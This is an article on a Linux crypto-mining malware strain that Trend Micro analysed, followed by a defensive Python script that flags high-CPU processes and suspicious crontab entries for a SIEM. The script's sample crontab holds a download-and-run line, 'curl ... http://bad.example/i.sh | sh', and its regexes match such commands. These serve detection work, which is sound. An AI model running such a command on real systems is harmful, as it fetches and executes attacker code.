- Security experts from Trend Micro found a new crypto-mining malware that kills other malicious miners
- While beneficial to the victim, the behaviour is entirely selfish by the attackers as it frees up resources for their own miner
Trend Micro’s security analysts have identified a new strain of Linux crypto-mining malware. It targets servers, installing the XMR-Stak Cryptonight cryptocurrency miner. The researchers have observed that it is also killing other coin miners that are present on the infected machine.
Discovered in a honeypot
Researchers detected the malware during a routine log check, after spotting a script in a honeypot that started downloading a binary connected to a domain. The binary turned out to be a modified version of the XMR-Stak cryptocurrency miner. In Trend Micro's published analysis, the researchers state:
“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS. It installs a cryptocurrency-mining malware as well as implants itself into the system and crontabs to survive reboots and deletions.”
The script did not stop at downloading the attackers' own miner. It disabled other crypto-mining malware present on the machine at the time of infection and blocked processes that tried to connect to IP addresses linked to known cybercrime activity.
Similarity to other threats
This code also has similarities to other threats. Specifically, the researchers observed that this malicious coin miner resembles Xbash, a malware family that Trend Micro also discovered in September last year. Xbash combines cryptocurrency mining, ransomware, worm, and scanner capabilities and attacks both Linux and Windows servers. According to the researchers, the threat's code is also near identical to the script of KORKERDS, another crypto-mining malware that they discovered back in November 2018.
However, there are also a few differences. The new script simplifies the routine KORKERDS used to load the Linux coin-miner sample and to download and execute files. It also did not install a rootkit on the infected machine, nor did it uninstall security solutions, which lets the victim keep protecting itself against rival attackers. The script's kill list targeted KORKERDS as well as its rootkit component. This suggests that the people behind the script are trying to maximize their profits by competing with KORKERDS' authors.
Defending against Linux crypto-mining malware
Security professionals can counter Linux crypto-mining malware with endpoint management and security platforms, which let them monitor endpoints for suspicious behavior.
Organizations can also use security information and event management (SIEM) tools, which can notify security teams of high central processing unit (CPU) or graphics processing unit (GPU) usage, a key indicator of cryptocurrency mining activity.
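The two indicators the article names, sustained high CPU usage and crontab persistence, can be turned into a simple host-side check that emits SIEM-ready records. The script below is an added example written for this page; it is not Trend Micro's code or any tool from their analysis. It works on constructed `ps` output and a constructed crontab, and the threshold, host name, paths and pool address are all assumptions chosen for illustration.

```python
"""Host check: flag processes with sustained high CPU and crontab entries that
re-fetch or run payloads from temp paths, then render both as JSON for a SIEM."""
import json
import re

CPU_THRESHOLD = 80.0   # percent of one core; assumption, tune per host role
MIN_SAMPLES = 2        # must exceed the threshold in this many consecutive samples

# Constructed `ps -eo pid,pcpu,comm,args --no-headers` output, two samples about a
# minute apart. PID 1337 stands in for an unauthorised miner; PID 2210 is a
# legitimate worker with a short CPU spike that should NOT be flagged.
PS_SAMPLES = [
    "  812  0.3 sshd     /usr/sbin/sshd -D\n"
    " 1337 97.8 xmr-stak /tmp/.x/xmr-stak -o pool.example:3333\n"
    " 2210 91.0 python3  /opt/app/worker.py\n"
    " 2230  1.2 nginx    nginx: worker process\n",
    "  812  0.1 sshd     /usr/sbin/sshd -D\n"
    " 1337 96.4 xmr-stak /tmp/.x/xmr-stak -o pool.example:3333\n"
    " 2210  4.5 python3  /opt/app/worker.py\n"
    " 2230  0.9 nginx    nginx: worker process\n",
]

# Constructed crontab. The certbot line is benign; the other two are the kinds of
# persistence the article describes (re-download-and-run, execution from /tmp).
CRONTAB_SAMPLE = """# constructed crontab for illustration
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://bad.example/i.sh | sh
@reboot /tmp/.x/xmr-stak -c /tmp/.x/config.json
"""

# Heuristics (assumptions): a download tool piped straight into a shell, or a
# command run out of a world-writable temp directory.
CRON_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+"),
]


def parse_ps(sample):
    """Parse one ps sample into dicts with pid, cpu, comm and args."""
    procs = []
    for line in sample.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        pid, cpu, comm = int(parts[0]), float(parts[1]), parts[2]
        args = parts[3] if len(parts) == 4 else ""
        procs.append({"pid": pid, "cpu": cpu, "comm": comm, "args": args})
    return procs


def sustained_high_cpu(samples, threshold=CPU_THRESHOLD, min_samples=MIN_SAMPLES):
    """Return processes above `threshold` in each of the last `min_samples` samples.
    Requiring persistence across samples filters out short bursts (builds, cron
    jobs, a worker's brief spike) that a single reading would misreport."""
    recent = [parse_ps(s) for s in samples[-min_samples:]]
    if len(recent) < min_samples:
        return []
    by_pid = [{p["pid"]: p for p in procs} for procs in recent]
    alerts = []
    for pid, proc in sorted(by_pid[-1].items()):
        readings = [s[pid]["cpu"] for s in by_pid if pid in s]
        if len(readings) == min_samples and min(readings) >= threshold:
            alerts.append({"pid": pid, "comm": proc["comm"],
                           "args": proc["args"], "min_cpu": min(readings)})
    return alerts


def suspicious_cron_entries(crontab_text):
    """Return non-comment crontab lines matching any persistence heuristic."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if any(p.search(line) for p in CRON_PATTERNS):
            hits.append(line.strip())
    return hits


def siem_events(host, cpu_alerts, cron_hits):
    """Render findings as newline-delimited JSON records for SIEM ingestion."""
    events = []
    for a in cpu_alerts:
        events.append({"host": host, "type": "sustained_high_cpu", **a})
    for c in cron_hits:
        events.append({"host": host, "type": "suspicious_cron_entry", "entry": c})
    return [json.dumps(e, sort_keys=True) for e in events]


if __name__ == "__main__":
    for event in siem_events("web01", sustained_high_cpu(PS_SAMPLES),
                             suspicious_cron_entries(CRONTAB_SAMPLE)):
        print(event)
```

On a real host the `PS_SAMPLES` list would be filled by running `ps -eo pid,pcpu,comm,args --no-headers` on a timer and keeping the last few outputs, and `CRONTAB_SAMPLE` by reading the system and per-user crontabs; the persistence requirement across samples is what keeps a CPU-based rule from paging on every compile job.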